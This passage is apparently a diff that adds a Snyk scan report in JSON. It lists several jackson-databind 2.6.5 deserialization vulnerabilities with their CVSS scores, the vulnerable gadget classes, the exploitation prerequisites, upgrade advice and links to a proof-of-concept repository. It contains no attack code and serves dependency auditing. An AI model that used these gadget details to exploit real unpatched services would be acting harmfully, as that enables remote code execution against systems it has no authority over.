"2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on 